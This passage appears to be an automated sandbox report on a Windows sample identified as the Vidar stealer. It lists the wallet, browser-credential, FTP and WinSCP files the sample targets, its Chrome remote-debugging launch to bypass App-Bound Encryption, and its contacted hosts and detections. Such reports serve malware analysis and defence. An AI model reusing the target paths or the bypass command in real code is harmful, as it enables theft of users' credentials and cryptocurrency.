(Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Ethereum\
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: |1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: |1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: |1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: |1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: |1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: keystore
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: |1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                  Source: Yara matchFile source: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: pjthjsdjgjrtavv.exe PID: 6960, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Attempt to bypass Chrome Application-Bound Encryption
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: pjthjsdjgjrtavv.exe, type: SAMPLE
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.pjthjsdjgjrtavv.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.pjthjsdjgjrtavv.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: Process Memory Space: pjthjsdjgjrtavv.exe PID: 6960, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                  Native API                  		1
                  Create Account                  		111
                  Process Injection                  		1
                  Masquerading                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		21
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Virtualization/Sandbox Evasion                  		1
                  Credentials in Registry                  		11
                  Query Registry                  		Remote Desktop Protocol4
                  Data from Local System                  		1
                  Remote Access Software                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
                  Process Injection                  		Security Account Manager111
                  Security Software Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information                  		NTDS1
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Obfuscated Files or Information                  		LSA Secrets12
                  Process Discovery                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  Account Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  System Owner/User Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem4
                  File and Directory Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow35
                  System Information Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578710 Sample: pjthjsdjgjrtavv.exe Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 51 frostman.shop 2->51 53 t.me 2->53 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 65 Multi AV Scanner detection for submitted file 2->65 67 7 other signatures 2->67 8 pjthjsdjgjrtavv.exe 33 2->8         started        12 msedge.exe 67 629 2->12         started        signatures3 process4 dnsIp5 55 frostman.shop 116.203.12.114, 443, 49700, 49701 HETZNER-ASDE Germany 8->55 57 t.me 149.154.167.99, 443, 49699 TELEGRAMRU United Kingdom 8->57 59 127.0.0.1 unknown unknown 8->59 69 Attempt to bypass Chrome Application-Bound Encryption 8->69 71 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 8->71 73 Found many strings related to Crypto-Wallets (likely being stolen) 8->73 75 5 other signatures 8->75 14 msedge.exe 2 11 8->14         started        17 chrome.exe 8->17         started        20 cmd.exe 8->20         started        22 msedge.exe 12->22         started        24 msedge.exe 12->24         started        26 msedge.exe 12->26         started        28 msedge.exe 12->28         started        signatures6 process7 dnsIp8 77 Monitors registry run keys for changes 14->77 30 msedge.exe 14->30         started        41 192.168.2.7, 123, 138, 443 unknown unknown 17->41 43 239.255.255.250 unknown Reserved 17->43 32 chrome.exe 17->32         started        35 conhost.exe 20->35         started        37 timeout.exe 20->37         started        45 sb.scorecardresearch.com 18.165.220.110, 443, 49845 MIT-GATEWAYSUS United States 22->45 47 18.173.219.113, 443, 49910 MIT-GATEWAYSUS United States 22->47 49 20 other IPs or domains 22->49 signatures9 process10 dnsIp11 39 www.google.com 172.217.21.36, 443, 49738, 49739 GOOGLEUS United States 32->39

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  pjthjsdjgjrtavv.exe49%VirustotalBrowse
                  pjthjsdjgjrtavv.exe58%ReversingLabsWin32.Trojan.Generic
                  pjthjsdjgjrtavv.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
